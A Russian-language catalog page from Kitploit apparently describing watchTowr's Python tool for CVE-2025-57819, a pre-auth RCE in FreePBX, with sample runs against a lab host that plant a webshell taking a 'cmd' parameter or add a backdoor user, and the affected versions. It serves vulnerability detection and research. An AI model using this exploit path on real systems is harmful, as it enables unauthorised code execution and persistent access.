Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
watchTowr-vs-FreePBX-CVE-2025-57819 — Генератор артефактов обнаружения на Python для CVE-2025-57819, эксплуатирующий pre-auth RCE в FreePBX через SQL-инъекцию и обход аутентификации для развертывания веб-шеллов или создания бэкдор-пользователей. | Kitploit
Инструменты/GitHubGitHub/watchtowrlabs/watchtowr-vs-freepbx-cve-2025-57819
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-freepbx-cve-2025-57819

watchTowr-vs-FreePBX-CVE-2025-57819

Генератор артефактов обнаружения на Python для CVE-2025-57819, эксплуатирующий pre-auth RCE в FreePBX через SQL-инъекцию и обход аутентификации для развертывания веб-шеллов или создания бэкдор-пользователей.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
28811 месяцев назадПроверено Kitploit

CVE-2025-57819 FreePBX Pre-Auth RCE

FreePBX Pre-Auth RCE 1day Detection Artifact Generator Tool

Обнаружение в действии

Генератор артефактов обнаружения пытается загрузить PHP-скрипт или добавить нового пользователя, если загрузка не удалась.

root@kitploit:~
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-FreePBX-CVE-2025-57819.py
        (*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE

          - Piotr and Sonny of watchTowr

[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://freepbx.lab.local/this-is-an-ioc-not-actually-watchTowr-pd3o125j59.php?cmd=hostname
[+] Cleaning.sh malicious cron_job - please confirm manually that there is no malicious entries in asterisk.cron_jobs table

Если загрузка PHP-скрипта не удается, выполняется откат к обнаружению на основе пользователя. Добавляется "случайное" имя пользователя со "случайным" паролем длиной 12 символов.

root@kitploit:~
$ python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://freepbx.lab.local
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-FreePBX-CVE-2025-57819.py
        (*) CVE-2025-57819 Detection Artifact Generator: FreePBX Auth Bypass + SQL Injection to RCE

          - Piotr and Sonny of watchTowr

[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[-] Webshell not found - falling back to user adding
[+] Adding user: watchTowrm0njzhj0ii / CdEf2DWGpT8u
[+] Verifying if user exists
[+] VULNERABLE: user added

Описание

Этот скрипт пытается обнаружить, уязвима ли FreePBX к CVE-2025-57819 Pre-Auth RCE.

Затронутые версии

< 15.0.66

< 16.0.89

< 17.0.3

Следите за watchTowr Labs

За последними исследованиями в области безопасности следите за командой watchTowr Labs

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

Скачать инструмент